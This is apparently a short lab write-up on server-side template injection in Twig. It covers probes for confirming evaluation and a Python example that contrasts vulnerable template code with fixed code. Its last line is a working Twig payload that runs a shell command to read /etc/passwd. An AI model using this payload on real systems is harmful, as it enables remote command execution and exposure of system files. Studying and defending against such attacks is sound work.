SSTI 0x01

SSTI, or server-side template injection, happens when user input is placed inside a template that the server then evaluates, so whatever template code the user typed runs on the server side.

Roughly: the application stores the user input in a variable (`variable_name = <user input>`, say `hello`), then evaluates it (`eval(variable_name)`), and the result, `hello`, is returned on the screen.

When we try to execute some commands, it returns an error, and the error message shows that the template engine is Twig.

credits to hacktricks

SSTI Twig (PHP)

{{7*7}}
{{7*'7'}} would also result in 49 (Twig coerces the numeric string)
{{dump(app)}}
{{dump(_context)}}
{{app.request.server.all|join(',')}}

Confirm it

A result of 49 means the code we are putting in is being executed on the server side.

If the page just echoes {{7*7}} back instead of 49, the input is only reflected on the client side and is not being evaluated.

In this case it came back as 49, so it was executed server side.
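The two points above (user input concatenated into the template source, and the {{7*7}} probe that tells server-side evaluation from plain reflection) as one added example. This is not code from the notes, from HackTricks or from Twig: it is a hand-written Python mini-engine that imitates the {{ ... }} syntax with arithmetic only, so it runs stand-alone. The names `render`, `greet_vulnerable`, `greet_safe` and `looks_injectable` are assumptions of this example.

```python
"""Mini template engine imitating the {{ ... }} expression syntax.

Added example (not the notes' own code, not Twig): it shows why building the
template source from user input is the SSTI bug, why passing the input as a
context variable is the fix, and how a defender can verify the fix with the
same 7*7 probe the notes use.
"""
import ast
import operator
import re

# Only arithmetic is allowed here. A real engine such as Twig exposes far
# more (objects, filters, functions), which is what lets SSTI reach the OS.
_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}


def _eval_expr(expr, context):
    """Evaluate one {{ ... }} expression: constants, + - * /, variable lookup."""
    def walk(node):
        if isinstance(node, ast.Constant):
            return node.value
        if isinstance(node, ast.Name):
            return context[node.id]
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported expression: {expr!r}")
    return walk(ast.parse(expr, mode="eval").body)


_TAG = re.compile(r"\{\{\s*(.*?)\s*\}\}")


def render(template, context=None):
    """Replace every {{ expr }} in the template source with its value.
    Substituted values are not re-scanned, so data never becomes code."""
    context = context or {}
    return _TAG.sub(lambda m: str(_eval_expr(m.group(1), context)), template)


def greet_vulnerable(user_input):
    # BUG: the user's text becomes part of the template SOURCE, so any
    # {{ ... }} they type is parsed and evaluated on the server.
    return render("Hello " + user_input)


def greet_safe(user_input):
    # FIX: the template source is a constant; the user's text is only DATA
    # in the context and is never parsed for tags.
    return render("Hello {{ name }}", {"name": user_input})


def looks_injectable(render_fn):
    """Defender-side check from the notes: if '{{7*7}}' comes back as 49 the
    expression was evaluated server-side; if it echoes literally, it was not."""
    return "49" in render_fn("{{7*7}}")


if __name__ == "__main__":
    for fn in (greet_vulnerable, greet_safe):
        print(f"{fn.__name__}: {fn('{{7*7}}')!r} injectable={looks_injectable(fn)}")
```

Running it prints `Hello 49` for the vulnerable function and the literal `Hello {{7*7}}` for the safe one. The same pattern applies to Twig: render a fixed template with the user value in the context array rather than building the template string from the request.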

Read /etc/passwd

{{['cat\x20/etc/passwd']|filter('system')}}
